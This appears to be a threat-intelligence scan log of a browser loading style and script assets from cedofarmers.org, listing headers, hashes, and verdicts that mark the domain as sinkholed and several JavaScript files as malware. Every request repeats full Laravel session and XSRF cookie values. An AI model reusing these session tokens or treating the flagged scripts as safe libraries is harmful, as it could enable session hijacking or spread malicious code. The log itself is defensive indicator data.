Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 19 Jun 2021 18:42:50 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 516
content-type: text/css
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/css/owl.theme.default.min.css
192.185.57.117  200 OK  446 B  URL HTTP/2 cedofarmers.org/css/owl.theme.default.min.css
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
MD5    829abaf1a058dee8d1c923200a574f17
SHA1   8acb6c114c4650ffa90f120d35061545c09b64e0
SHA256 380a836084c2489b0ba6266d630d9cd26b12a2f3151ce0d7ce11f7de5377d0f3
Analyzer      Verdict    Alert
mnemonic_dns  Sinkholed
quad9         Sinkholed
GET /css/owl.theme.default.min.css HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 446
content-type: text/css
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/css/magnific-popup.css
192.185.57.117  200 OK  2.2 kB  URL HTTP/2 cedofarmers.org/css/magnific-popup.css
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
MD5    757c165194bdd1de4ca4a38bfea220f7
SHA1   c1d4a88790cd476995d9a5ff7db8de77cc39c5d0
SHA256 772675dc2c0403949be38fc53d785d9124fad348324d0be6a75c174800afa8ea
Analyzer      Verdict    Alert
mnemonic_dns  Sinkholed
quad9         Sinkholed
GET /css/magnific-popup.css HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 2191
content-type: text/css
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/css/animate.css
192.185.57.117  200 OK  7.3 kB  URL HTTP/2 cedofarmers.org/css/animate.css
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
MD5    c7a2b713e689dcbcba933282930c18df
SHA1   07d6bab3d164902128825ea44e6c408b1b9f1bcc
SHA256 ba217008e30851184739f646cb37a0a9a8e8b0b5ccd9a426c4a8a6a7c5ea6105
Analyzer      Verdict    Alert
mnemonic_dns  Sinkholed
quad9         Sinkholed
GET /css/animate.css HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 7310
content-type: text/css
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/css/aos.css
192.185.57.117  200 OK  2.2 kB  URL HTTP/2 cedofarmers.org/css/aos.css
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type ASCII text, with very long lines (25948)
MD5    42e52dc8ebb4e86a83acbe2e3a433a2d
SHA1   c102f5a5756bd293cfbd890706560f924a8b2dad
SHA256 3430e9404526e3626b63dbde1ee828089ef07bb73852df0eadff5f403d078762
Analyzer      Verdict    Alert
mnemonic_dns  Sinkholed
quad9         Sinkholed
GET /css/aos.css HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 2196
content-type: text/css
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/css/ionicons.min.css
192.185.57.117  200 OK  8.9 kB  URL HTTP/2 cedofarmers.org/css/ionicons.min.css
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type Unicode text, UTF-8 text, with very long lines (46353)
MD5    30e1e5b3be98130dc13f66e3d5d4a4dd
SHA1   16945c3b91fe3b7e84c83789c3a7158be4cf3f9c
SHA256 e4979dc06bca7b944980d478d583e27d530931eb6e9f560822ad3049cfc70643
Analyzer      Verdict    Alert
mnemonic_dns  Sinkholed
quad9         Sinkholed
GET /css/ionicons.min.css HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 8872
content-type: text/css
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/css/bootstrap-datepicker.css
192.185.57.117  200 OK  3.6 kB  URL HTTP/2 cedofarmers.org/css/bootstrap-datepicker.css
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
MD5    14373813f111ee36904a15a3b750b0c9
SHA1   2b0edd4a5bd61060da384d04424f83e2dd644c56
SHA256 90e8499185ca0fd4d32fb2088117f7b9ce4e399b7d876070c3669b0c64ac4404
Analyzer      Verdict    Alert
mnemonic_dns  Sinkholed
quad9         Sinkholed
GET /css/bootstrap-datepicker.css HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 3576
content-type: text/css
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/css/flaticon.css
192.185.57.117  200 OK  466 B  URL HTTP/2 cedofarmers.org/css/flaticon.css
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
MD5    745c2e66a7681f81fecd0399f16054e0
SHA1   d36db54699951ea73000ece2604a5c1f1ee4d932
SHA256 5f9c839e836adefc596f4a675ab9b59f49f6d13c0670e11eb18bbf44841bb41d
Analyzer      Verdict    Alert
mnemonic_dns  Sinkholed
quad9         Sinkholed
GET /css/flaticon.css HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 466
content-type: text/css
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/css/jquery.timepicker.css
192.185.57.117  200 OK  456 B  URL HTTP/2 cedofarmers.org/css/jquery.timepicker.css
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
MD5    c310f69ed9a3cd6ce699c5df769a7e28
SHA1   dec2efbf8cbf89cecfece91877b361f23356dd57
SHA256 edd2492f889f995428231e2c07a819831840294fef6a9d59cea7e54c8932dff2
Analyzer      Verdict    Alert
mnemonic_dns  Sinkholed
quad9         Sinkholed
GET /css/jquery.timepicker.css HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 456
content-type: text/css
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/js/popper.min.js
192.185.57.117 200 OK 8.1 kB URL HTTP/2 cedofarmers.org/js/popper.min.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type ASCII text, with very long lines (18860)
Hash 5996341f0746435a8fa35e664d9d66a4
29f2b76dad23c3dd64a8a86924bbb8e1b6dc8782
0bcca1c908b2eaf5de34371c31e7976e95f4b38e09764be3ce6330df72d6be3c
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/popper.min.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 8080
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/css/icomoon.css
192.185.57.117 200 OK 14 kB URL HTTP/2 cedofarmers.org/css/icomoon.css
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Hash 7a704ee33ed7777f856bd19a6d54c133
1706b2c62d08a8b48d71e6e46e9cc18e03d9f040
0089a5b5cd9f1d273312b6a6a73ab075e0a28a2d1b11681570ce39d5286837eb
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /css/icomoon.css HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 13989
content-type: text/css
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/js/jquery-migrate-3.0.1.min.js
192.185.57.117 200 OK 3.9 kB URL HTTP/2 cedofarmers.org/js/jquery-migrate-3.0.1.min.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Hash 5eb86a89a29cbbdf4c50ed77ecdbea34
e0f8e06212fb706648209755fab270b7ba804caa
072d17e2f98fa8124dda17d0e874f4e9225164193ac304fd29a489e35f57d051
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/jquery-migrate-3.0.1.min.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 3888
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/js/jquery.stellar.min.js
192.185.57.117 200 OK 4.1 kB URL HTTP/2 cedofarmers.org/js/jquery.stellar.min.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type ASCII text, with very long lines (12453)
Hash 3525f2201b4f09032255aa580b5ffb6f
00b2c0b860cdc0a4d466575d57b6f3d9b748decc
700f7e51cd1033335fd0dff2838e02e9cbf3fd206eb4635de5fd07ccaa92dfaa
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/jquery.stellar.min.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
